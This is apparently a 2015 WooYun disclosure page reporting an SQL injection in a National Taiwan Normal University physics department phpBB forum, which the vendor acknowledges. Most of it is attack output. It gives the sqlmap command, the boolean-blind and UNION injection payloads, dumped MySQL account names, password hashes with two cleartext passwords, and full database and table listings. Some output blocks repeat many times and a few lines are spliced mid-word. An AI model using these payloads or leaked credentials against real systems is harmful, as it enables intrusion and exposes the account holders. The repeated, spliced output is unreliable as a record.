当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153706

漏洞标题:國立臺灣師範大學物理學系存在SQL註入漏洞(DBA權限;root密碼泄露;47個庫;111個表;數百萬用戶日誌泄露)(臺灣地區)

相关厂商:國立臺灣師範大學

漏洞作者: 路人甲

提交时间:2015-11-12 08:22

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-12: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

國立臺灣師範大學物理學系存在SQL註入漏洞(DBA權限;root密碼泄露;47個庫;111個表;數百萬用戶日誌泄露)

详细说明:

地址:http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712

python sqlmap.py -u "http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712" -p topic --technique=BU --random-agent --threads=10 --current-user --is-dba --users --passwords --dbs


back-end DBMS: MySQL 5
Database: phpBB
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| searchkey          | 1450190 |
| key_usage          | 1122007 |
| searchlog          | 833170  |
| referer            | 794399  |
| key_pair_post      | 781424  |
| userslog20140930   | 745161  |
| iplog              | 707156  |
| userslog           | 601349  |
| userslogrobot      | 461548  |

漏洞证明:

---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
current user:    'fkh@localhost'
current user is DBA:    True
database management system users [8]:
[*] 'apho'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'fkh'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'physicsweb'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'node2'
database management system users password hashes:
[*] apho [1]:
    password hash: *64E12F5E6D61B5873796CB260105353370633012
[*] debian-sys-maint [1]:
    password hash: *E489594742451E251CCAD27ADD37972235824E50
[*] fkh [1]:
    password hash: *977F15BF49C046DA76BC81A80146AAB943F679F1
    clear-text password: teacher
[*] phpmyadmin [1]:
    password hash: *1CD50D9F2E5B99D42FA7B961A145622D056C1090
[*] physicsweb [1]:
    password hash: *EB96051EB07A5A9370DD3FAE23FA22948D67B4BA
    clear-text password: physicsweb
[*] root [1]:
    password hash: *1CD50D9F2E5B99D42FA7B961A145622D056C1090
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating ssqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating ssqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
available databases [47]:
[*] ajax
[*] anndb
[*] apache
[*] apho
[*] Demolab
[*] demolab
[*] drupal
[*] drupal6
[*] ejsdl
[*] ejslauncher
[*] ejsweb
[*] home
[*] information_schema
[*] javadoc
[*] joomla
[*] mdl_physlet
[*] moodle
[*] mysql
[*] mywiki
[*] ocs
[*] osejs
[*] phpBB
[*] phpBB2
[*] phpBBlog
[*] phpBBsaved
[*] phpmyadmin
[*] phpmyadmin2
[*] phptree
[*] physicsweb
[*] physlet_physics
[*] physlets
[*] phytest
[*] play
[*] playsun
[*] playying
[*] saved
[*] smf
[*] svg
[*] test
[*] tiki
[*] tmp
[*] visitors
[*] weave
[*] wiki
[*] wiki1_15_1
[*] wikidb
[*] wikidrupal
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
current database:    'phpBB'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating ssqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
Database: phpBB
[111 tables]
+--------------------+
| access             |
| banlist            |
| catagories         |
| circuitsimulator   |
| cmap               |
| colors             |
| config             |
| creditlog          |
| demoExps           |
| demolabonline      |
| disallow           |
| ejsuser_download   |
| ejsweb             |
| ejsweblog          |
| ejsxml             |
| enjoywiki          |
| explorec           |
| favortopics        |
| file_explorer      |
| fkh_q              |
| fkh_qlog           |
| forum_access       |
| forum_mods         |
| forums             |
| googlegetlog       |
| headermetafooter   |
| heq                |
| imgurl             |
| iplog              |
| jacob              |
| jacobui            |
| key_log            |
| key_log_post       |
| key_map            |
| key_map_time       |
| key_pair           |
| key_pair_post      |
| key_related_log    |
| key_topic          |
| key_usage          |
| key_word           |
| log_geo            |
| logip              |
| math_tex           |
| moodleurl          |
| notes              |
| notify             |
| ntnujava_note      |
| ntnujavazip        |
| osejs              |
| phy_translation    |
| physicslist        |
| physicslisttopic   |
| physicsterms       |
| posts              |
| posts_downloadfile |
| posts_misconcept   |
| posts_note         |
| postsfkh           |
| priv_msgs          |
| priv_msgs_no       |
| problem            |
| puzzlelog          |
| quiz               |
| quizlog            |
| ranks              |
| referer            |
| replychk           |
| resource           |
| sci2003            |
| search_keywords    |
| searchkey          |
| searchlog          |
| sessions           |
| sig2009            |
| simlab             |
| simulations        |
| simulations_elog   |
| sites              |
| siteurl            |
| siteurlerror       |
| smiles             |
| snapshotejs        |
| sudokulog          |
| svg                |
| themes             |
| topic_keyword      |
| topic_state        |
| topic_statedata    |
| topics             |
| tree               |
| tree_elements      |
| tree_topic         |
| tree_user          |
| twip               |
| user_hacker_log    |
| user_upload        |
| users              |
| userslog           |
| userslog20140930   |
| usersloginlog      |
| usersloginout      |
| userslogrobot      |
| webdata            |
| whosonline         |
| wikilink           |
| wikititle          |
| wikititlecount     |
| words              |
| youtube            |
| youtube_note       |
+--------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
Database: phpBB
Table: user_hacker_log
[7 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| time     | int(10) unsigned |
| email    | varchar(64)      |
| id       | int(10) unsigned |
| pass     | varchar(40)      |
| passmd5  | varchar(40)      |
| type     | tinyint(4)       |
| username | varchar(40)      |
+----------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=23712) AND 9549=9549 AND (4804=4804
    Type: UNION query
    Title: MySQL UNION query (19) - 6 columns
    Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL 5
Database: phpBB
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| searchkey          | 1450190 |
| key_usage          | 1122007 |
| searchlog          | 833170  |
| referer            | 794399  |
| key_pair_post      | 781424  |
| userslog20140930   | 745161  |
| iplog              | 707156  |
| userslog           | 601349  |
| userslogrobot      | 461548  |
| key_map            | 398123  |
| logip              | 324443  |
| key_log_post       | 265103  |
| enjoywiki          | 141244  |
| key_pair           | 138177  |
| posts              | 134764  |
| usersloginlog      | 118073  |
| key_log            | 113843  |
| user_hacker_log    | 70410   |
| fkh_qlog           | 58391   |
| users              | 42831   |
| phy_translation    | 33145   |
| key_word           | 30139   |
| replychk           | 26202   |
| topics             | 25874   |
| physicsterms       | 24331   |
| key_related_log    | 22981   |
| key_topic          | 20552   |
| priv_msgs          | 19589   |
| ntnujavazip        | 17662   |
| topic_state        | 15709   |
| siteurlerror       | 13645   |
| siteurl            | 13644   |
| googlegetlog       | 12901   |
| log_geo            | 12641   |
| usersloginout      | 9065    |
| math_tex           | 7016    |
| user_upload        | 5145    |
| postsfkh           | 4804    |
| sites              | 4517    |
| physicslisttopic   | 4012    |
| notify             | 3877    |
| creditlog          | 2822    |
| sudokulog          | 2471    |
| sci2003            | 1998    |
| ejsxml             | 1605    |
| favortopics        | 1514    |
| whosonline         | 1513    |
| topic_statedata    | 1397    |
| demolabonline      | 1387    |
| osejs              | 1219    |
| wikilink           | 981     |
| snapshotejs        | 815     |
| demoExps           | 626     |
| webdata            | 478     |
| problem            | 457     |
| key_map_time       | 438     |
| forum_access       | 390     |
| fkh_q              | 378     |
| ntnujava_note      | 343     |
| tree               | 292     |
| tree_topic         | 242     |
| sig2009            | 240     |
| colors             | 220     |
| forum_mods         | 201     |
| file_explorer      | 160     |
| twip               | 148     |
| forums             | 143     |
| ejsweblog          | 131     |
| physicslist        | 125     |
| puzzlelog          | 72      |
| notes              | 67      |
| simulations        | 67      |
| ejsweb             | 47      |
| jacob              | 47      |
| posts_note         | 40      |
| simulations_elog   | 40      |
| wikititlecount     | 38      |
| smiles             | 32      |
| banlist            | 28      |
| priv_msgs_no       | 22      |
| catagories         | 19      |
| wikititle          | 17      |
| posts_downloadfile | 14      |
| topic_keyword      | 14      |
| jacobui            | 10      |
| tree_elements      | 10      |
| cmap               | 7       |
| resource           | 7       |
| access             | 5       |
| heq                | 5       |
| ranks              | 5       |
| quiz               | 4       |
| themes             | 4       |
| disallow           | 3       |
| explorec           | 3       |
| moodleurl          | 3       |
| sessions           | 3       |
| circuitsimulator   | 2       |
| posts_misconcept   | 2       |
| youtube            | 2       |
| config             | 1       |
| headermetafooter   | 1       |
| svg                | 1       |
| tree_user          | 1       |
| youtube_note       | 1       |
+--------------------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-20 06:54

厂商回复:

感謝通報

最新状态:

暂无